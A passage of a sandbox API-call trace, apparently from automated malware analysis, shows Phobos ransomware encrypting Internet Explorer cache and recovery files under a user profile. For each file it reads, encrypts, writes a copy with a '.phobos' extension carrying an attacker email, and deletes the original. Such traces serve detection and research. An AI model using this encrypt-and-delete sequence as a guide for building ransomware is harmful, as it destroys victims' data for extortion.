pdwDataLen=0x2f4fc48*=0x2fb0) returned 1 [0166.212] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2fb0, lpOverlapped=0x0) returned 1 [0166.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0166.212] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.213] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.213] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.213] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.213] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.213] CloseHandle (hObject=0x134) returned 1 [0166.213] CloseHandle (hObject=0x158) returned 1 [0166.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak")) returned 1 [0166.214] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.214] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12208) returned 1 [0166.214] CloseHandle (hObject=0x158) returned 1 [0166.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt")) returned 0x2020 [0166.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0166.215] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.215] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2fb0, lpOverlapped=0x0) returned 1 [0166.226] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2fc0, dwBufLen=0x2fc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2fc0) returned 1 [0166.226] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2fc0, lpOverlapped=0x0) returned 1 [0166.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0166.227] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.227] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.227] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.227] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.227] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.227] CloseHandle (hObject=0x158) returned 1 [0166.227] CloseHandle (hObject=0x134) returned 1 [0166.227] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt")) returned 1 [0166.228] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.229] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13) returned 1 [0166.229] CloseHandle (hObject=0x134) returned 1 [0166.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml")) returned 0x2020 [0166.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.230] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0166.230] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.230] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd, lpOverlapped=0x0) returned 1 [0166.231] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10, dwBufLen=0x10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10) returned 1 [0166.231] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10, lpOverlapped=0x0) returned 1 [0166.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0166.233] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.233] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0166.233] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.233] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0166.233] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.233] CloseHandle (hObject=0x134) returned 1 [0166.233] CloseHandle (hObject=0x158) returned 1 [0166.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml")) returned 1 [0166.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.234] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32768) returned 1 [0166.234] CloseHandle (hObject=0x158) returned 1 [0166.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat")) returned 0x2026 [0166.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.235] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.235] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0166.241] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.241] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8000, lpOverlapped=0x0) returned 1 [0166.354] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010, dwBufLen=0x8010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010) returned 1 [0166.354] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8010, lpOverlapped=0x0) returned 1 [0166.356] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0166.356] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.356] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.356] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.356] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.356] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.356] CloseHandle (hObject=0x158) returned 1 [0166.356] CloseHandle (hObject=0x134) returned 1 [0166.356] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat")) returned 1 [0166.358] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.377] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16384) returned 1 [0166.377] CloseHandle (hObject=0x178) returned 1 [0166.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat")) returned 0x2020 [0166.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.378] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.378] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.378] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ba8) returned 1 [0166.378] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4000, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010, dwBufLen=0x4010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010) returned 1 [0166.379] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4010, lpOverlapped=0x0) returned 1 [0166.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0166.382] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.382] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.382] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0166.382] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.382] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.382] CloseHandle (hObject=0x178) returned 1 [0166.382] CloseHandle (hObject=0x190) returned 1 [0166.382] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat")) returned 1 [0166.383] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.384] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3584) returned 1 [0166.384] CloseHandle (hObject=0x190) returned 1 [0166.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat")) returned 0x2020 [0166.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.385] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.385] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.385] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ba8) returned 1 [0166.385] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.385] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, 